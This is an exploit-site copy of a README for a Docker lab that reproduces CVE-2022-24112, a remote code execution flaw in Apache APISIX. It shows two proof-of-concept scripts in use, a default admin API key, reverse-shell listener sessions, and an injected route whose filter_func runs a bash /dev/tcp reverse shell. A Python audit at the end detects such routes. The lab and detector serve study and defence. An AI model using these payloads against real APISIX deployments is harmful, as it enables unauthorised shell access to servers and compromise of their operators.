## https://sploitus.com/exploit?id=84917A44-9615-5FAA-A4D1-665234CD2CCF
# Apache APISIX < 2.12.1 Remote Code Execution and Docker Lab
Clone this repository with `git clone`, then navigate to `apisix-docker/example`. The `docker-compose.yml` file there has already been changed to `image: apache/apisix:2.12.0-alpine`, because the vulnerability is present in this version. Then bring the lab up with Docker Compose.
Quick start via docker-compose: we can start all modules with docker-compose.
```bash
$ cd example
$ docker-compose -p docker-apisix up -d
```
Use `docker ps -a` to make sure the Docker containers are already running in the background. Once that is done, we can access the API with a simple `curl`:
```bash
$ curl 'http://127.0.0.1:9080/apisix/admin/routes?api_key=edd1c9f034335f136f87ad84b625c8f1' -i
HTTP/1.1 200 OK
Date: Sun, 20 Mar 2022 15:49:17 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Server: APISIX/2.12.0
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true
Access-Control-Expose-Headers: *
Access-Control-Max-Age: 3600
{"count":0,"action":"get","node":{"key":"\/apisix\/routes","nodes":{},"dir":true}}
```
- `poc.py`. Exploit usage: `python3 50829.py http://127.0.0.1:9080/ 172.18.0.1 4444`
```bash
$ python3 50829.py http://127.0.0.1:9080/ 172.18.0.1 4444
. ,
_.._ * __*\./ ___ _ \./._ | _ *-+-
(_][_)|_) |/'\ (/,/'\[_)|(_)| |
| |
(CVE-2022-24112)
{ Coded By: Ven3xy | Github: https://github.com/M4xSec/ }
```
Reverse shell connection:
```bash
$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [172.18.0.1] from (UNKNOWN) [172.19.0.8] 52334
id
uid=65534(nobody) gid=65534(nobody) groups=65534(nobody)
pwd
/usr/local/apisix
ls -la
total 52
drwxr-xr-x 1 root root 4096 Mar 20 15:48 .
drwxr-xr-x 1 root root 4096 Jan 28 09:06 ..
drwxr-xr-x 13 root root 4096 Jan 28 09:07 apisix
drwx------ 2 nobody root 4096 Mar 20 15:48 client_body_temp
drwxr-xr-x 1 root root 4096 Mar 20 15:48 conf
drwxr-xr-x 5 root root 4096 Jan 28 09:07 deps
drwx------ 2 nobody root 4096 Mar 20 15:48 fastcgi_temp
drwxr-xr-x 2 1000 1000 4096 Mar 20 15:48 logs
drwx------ 2 nobody root 4096 Mar 20 15:48 proxy_temp
drwx------ 2 nobody root 4096 Mar 20 15:48 scgi_temp
drwx------ 2 nobody root 4096 Mar 20 15:48 uwsgi_temp
```
- `poc2.py`. Exploit usage: `python3 poc2.py -h`
```bash
$ python3 poc2.py -h
>> Apache APISIX 2.12.1 - Remote Code Execution (RCE)
>> by twseptian
usage: poc2.py [-h] -t TARGET_IP -p TARGET_PORT -L LOCALHOST -P LOCALPORT

Apache APISIX 2.12.1 - Remote Code Execution (RCE)

optional arguments:
  -h, --help            show this help message and exit
  -t TARGET_IP, --rhost TARGET_IP
                        Target IP
  -p TARGET_PORT, --rport TARGET_PORT
                        Target Port
  -L LOCALHOST, --lhost LOCALHOST
                        Localhost/Local IP
  -P LOCALPORT, --lport LOCALPORT
                        Localport
```
Exploit usage: `python3 poc2.py -t 127.0.0.1 -p 9080 -L 172.18.0.1 -P 4444`
```bash
$ python3 poc2.py -t 127.0.0.1 -p 9080 -L 172.18.0.1 -P 4444
>> Apache APISIX 2.12.1 - Remote Code Execution (RCE)
>> by twseptian
[!] Take RCE
listening on [any] 4444 ...
connect to [172.18.0.1] from (UNKNOWN) [172.19.0.8] 52372
id
uid=65534(nobody) gid=65534(nobody) groups=65534(nobody)
pwd
/usr/local/apisix
ls -la
total 52
drwxr-xr-x 1 root root 4096 Mar 20 15:48 .
drwxr-xr-x 1 root root 4096 Jan 28 09:06 ..
drwxr-xr-x 13 root root 4096 Jan 28 09:07 apisix
drwx------ 2 nobody root 4096 Mar 20 15:48 client_body_temp
drwxr-xr-x 1 root root 4096 Mar 20 15:48 conf
drwxr-xr-x 5 root root 4096 Jan 28 09:07 deps
drwx------ 2 nobody root 4096 Mar 20 15:48 fastcgi_temp
drwxr-xr-x 2 1000 1000 4096 Mar 20 15:48 logs
drwx------ 2 nobody root 4096 Mar 20 15:48 proxy_temp
drwx------ 2 nobody root 4096 Mar 20 15:48 scgi_temp
drwx------ 2 nobody root 4096 Mar 20 15:48 uwsgi_temp
```
```bash
$ curl -s 'http://127.0.0.1:9080/apisix/admin/routes?api_key=edd1c9f034335f136f87ad84b625c8f1' | jq
{
  "count": 1,
  "action": "get",
  "node": {
    "key": "/apisix/routes",
    "nodes": [
      {
        "modifiedIndex": 161,
        "value": {
          "priority": 0,
          "uri": "/rms/fzxewh",
          "status": 1,
          "upstream": {
            "hash_on": "vars",
            "pass_host": "pass",
            "nodes": {
              "schmidt-schaefer.com": 1
            },
            "type": "roundrobin",
            "scheme": "http"
          },
          "id": "index",
          "create_time": 1647791428,
          "filter_func": "function(vars) os.execute('bash -c \\\"0<&160-;exec 160<>/dev/tcp/172.18.0.1/4444;/bin/sh <&160 >&160 2>&160\\\"'); return true end",
          "update_time": 1647799320,
          "name": "wthtzv"
        },
        "key": "/apisix/routes/index",
        "createdIndex": 16
      }
    ],
    "dir": true
  }
}
```
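The route listing above is the artifact the exploit leaves behind: a route whose `filter_func` calls `os.execute`. The following Python audit is an added example, not part of the original repository or of either PoC; it flags such routes in an Admin API route listing. The function names, the list of suspicious Lua calls and the sample listings are assumptions made for this example.

```python
import json
import re

# Lua calls that should never appear in a route's filter_func (assumed list,
# chosen for this example; extend it to match your own policy).
SUSPICIOUS_LUA = re.compile(r"\b(os\.execute|io\.popen|loadstring|dofile)\b")

def iter_routes(listing):
    """Yield (key, value) per route. `nodes` is a list when routes exist and
    an empty object when there are none, as both responses above show."""
    nodes = listing.get("node", {}).get("nodes") or []
    if isinstance(nodes, dict):
        nodes = list(nodes.values())
    for node in nodes:
        yield node.get("key", "?"), node.get("value", {})

def audit_routes(listing):
    """Return one finding per route whose filter_func calls into the OS."""
    findings = []
    for key, route in iter_routes(listing):
        calls = sorted(set(SUSPICIOUS_LUA.findall(route.get("filter_func") or "")))
        if calls:
            findings.append({"key": key, "uri": route.get("uri"),
                             "update_time": route.get("update_time"),
                             "calls": calls})
    return findings

# Constructed sample listings (shaped like the responses above, not captured).
EMPTY = json.loads(
    r'{"count":0,"action":"get","node":{"key":"\/apisix\/routes","nodes":{},"dir":true}}'
)
SAMPLE = {"count": 2, "action": "get", "node": {"key": "/apisix/routes", "dir": True, "nodes": [
    {"key": "/apisix/routes/1", "value": {
        "uri": "/hello", "update_time": 1647790000,
        # A filter_func that only inspects request variables is not flagged.
        "filter_func": "function(vars) return vars.arg_name == 'json' end"}},
    {"key": "/apisix/routes/index", "value": {
        "uri": "/rms/fzxewh", "update_time": 1647799320,
        # Harmless stand-in command; only the os.execute call matters here.
        "filter_func": "function(vars) os.execute('id'); return true end"}},
]}}

if __name__ == "__main__":
    for f in audit_routes(SAMPLE):
        print(f"{f['key']} uri={f['uri']} updated={f['update_time']} "
              f"calls={','.join(f['calls'])}")
```

To audit the lab, parse the output of the `curl` command shown above with `json.loads` and pass it to `audit_routes`; the `update_time` in each finding gives a starting point for correlating with access logs.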
## Credits
- [Apache APISIX Docker - Manual deploy apisix via docker](https://github.com/apache/apisix-docker)
- [Apache APISIX < 2.12.1 Remote Code Execution](https://kavigihan.medium.com/apache-apisix-2-12-1-remote-code-execution-5f920b22ccff)
- [Exploit-DB - Apache APISIX 2.12.1 - Remote Code Execution (RCE)](https://www.exploit-db.com/exploits/50829)
- [GitHub - Apache APISIX Remote Code Execution (CVE-2022-24112) Exploit](https://github.com/M4xSec/Apache-APISIX-CVE-2022-24112)